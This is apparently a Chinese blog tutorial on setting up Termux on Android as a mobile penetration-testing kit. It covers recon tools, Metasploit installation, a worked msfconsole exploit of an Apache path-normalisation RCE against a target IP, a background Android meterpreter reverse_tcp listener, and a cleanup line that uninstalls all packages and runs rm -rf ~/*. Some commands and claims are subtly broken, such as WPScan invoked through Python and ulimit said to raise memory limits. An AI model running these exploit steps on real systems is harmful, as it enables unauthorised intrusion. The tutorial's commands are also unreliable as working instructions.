1. Termux入门你的口袋里的渗透测试实验室第一次听说Termux时我正坐在咖啡馆里用手机刷技术论坛。当时我就在想要是能把Kali Linux装进手机该多酷没想到Termux真的让这个想法成真了。它本质上是一个Android终端模拟器但远不止于此——通过它你可以在手机上运行完整的Linux环境安装各种安全工具把普通手机变成移动渗透测试平台。与传统的虚拟机方案相比Termux有几个明显优势。首先是便携性你随时可以从口袋里掏出手机开始工作其次是资源占用低我的旧手机跑Kali虚拟机卡得要命但Termux运行流畅最重要的是它支持apt包管理这意味着你可以像在Ubuntu上一样轻松安装各种工具。不过要提醒的是Termux默认不带root权限。有些高级功能确实需要root但大多数基础操作完全可以在非root环境下完成。我建议新手先从非root模式开始等熟悉了再考虑root的事。毕竟安全研究最重要的是思路和技能而不是工具本身有多强大。2. 环境搭建从零开始的Termux配置2.1 基础环境准备安装Termux的第一步就让我踩了个坑——从第三方网站下载的版本总是闪退。后来发现F-Droid上的官方版本最稳定。安装完成后第一件事永远是更新软件源pkg update pkg upgrade这个命令会更新软件包列表并升级所有已安装的包。我建议每次打开Termux都先跑一遍这个命令保持环境最新。接下来是基础工具链的安装。这些工具在后续操作中会频繁用到pkg install git curl wget nano vim如果你像我一样经常需要编辑配置文件强烈建议安装nano或vim。Termux自带的文本编辑器功能有限而这两个工具能让你在手机上也能高效编辑代码。2.2 存储权限配置Termux默认只能访问自己的安装目录要访问手机存储需要额外配置termux-setup-storage执行后会弹出权限请求同意后Termux就能访问手机存储了。这时会在home目录下创建storage目录里面包含各种存储链接storage/downloads → 下载目录storage/dcim → 相册storage/shared → 整个存储空间这个功能特别实用比如你可以把扫描报告直接保存到下载目录方便用其他应用查看。3. 渗透测试工具全家桶3.1 信息收集工具信息收集是渗透测试的第一步Termux上可以安装各种强大的侦查工具。我最常用的是ReconDog它是一个多功能的侦查工具包pkg install python2 git git clone https://github.com/UltimateHackers/ReconDog.git cd ReconDog chmod x dog.py python2 dog.py运行后会显示一个交互式菜单提供Whois查询、DNS查询、子域名扫描等功能。实测下来它的反向IP查询特别有用能快速发现同一服务器上的其他网站。另一个必备工具是RED_HAWK专为网站侦查设计pkg install php git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK php rhawk.php它集成了CMS检测、敏感文件扫描、端口扫描等功能。我特别喜欢它的爬虫功能能自动提取网站的所有链接和表单。3.2 漏洞利用框架Metasploit无疑是渗透测试的瑞士军刀。在Termux上安装它需要一些技巧pkg install unstable-repo pkg install metasploit cd $PREFIX/opt/metasploit-framework ./msfconsole安装过程可能会比较慢建议在WiFi环境下进行。第一次启动msfconsole时它会初始化数据库这可能需要几分钟。成功后你会看到标志性的msf提示符。一个小技巧Termux上的Metasploit资源占用较大长时间使用可能会导致手机发热。我通常会在不需要时用exit命令退出或者直接关闭Termux会话。4. 实战演练从信息收集到漏洞利用4.1 目标侦查案例假设我们要测试一个网站的安全性完整的侦查流程可能是这样的先用ReconDog进行基础信息收集python2 dog.py选择Website Recon功能输入目标域名获取IP、DNS记录等信息。使用RED_HAWK进行深度扫描php rhawk.php重点关注它发现的敏感目录和文件比如/admin、/backup等。针对特定服务进行漏洞扫描。如果发现WordPress站点可以用pkg install python git clone https://github.com/wpscanteam/wpscan cd wpscan python wpscan.py --url 目标网站 --enumerate p4.2 漏洞利用实例发现目标运行着旧版Apache服务器后我们可以尝试已知漏洞利用msfconsole use exploit/multi/http/apache_normalize_path_rce set RHOSTS 目标IP set RPORT 80 set TARGETURI / exploit如果成功我们会获得一个meterpreter会话。这时可以执行sysinfo getuid获取系统信息。在Termux上操作meterpreter会话时建议使用外接键盘因为有些命令需要特殊按键组合。5. 高级技巧与疑难排解5.1 持久化与后台运行Termux默认关闭后进程会被终止。要保持Metasploit监听会话可以使用Termux的唤醒锁定和后台服务功能termux-wake-lock ./msfconsole -q -x use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; exploit这样即使切换到其他应用监听会话也会保持活动状态。记得用完后再执行termux-wake-unlock释放唤醒锁以节省电量。5.2 常见问题解决软件包安装失败首先尝试更新软件源pkg update如果还是失败可以清除缓存pkg clean内存不足Termux默认只使用有限的内存。对于内存密集型任务可以尝试ulimit -Sv 500000这会临时增加内存限制。终端显示异常有时滚动会出问题可以安装Termux的官方插件Termux:Styling来调整字体和配色。6. 合法合规与最佳实践在移动设备上进行渗透测试虽然方便但也要特别注意合法性。我始终坚持三个原则只测试自己拥有或获得明确书面授权的系统不在公共WiFi上进行敏感操作测试完成后立即删除所有敏感数据Termux环境的清理也很重要pkg list-installed | cut -d/ -f1 | xargs pkg uninstall rm -rf ~/*这会卸载所有软件包并清除用户数据。对于root过的设备还需要检查/system分区是否被修改过。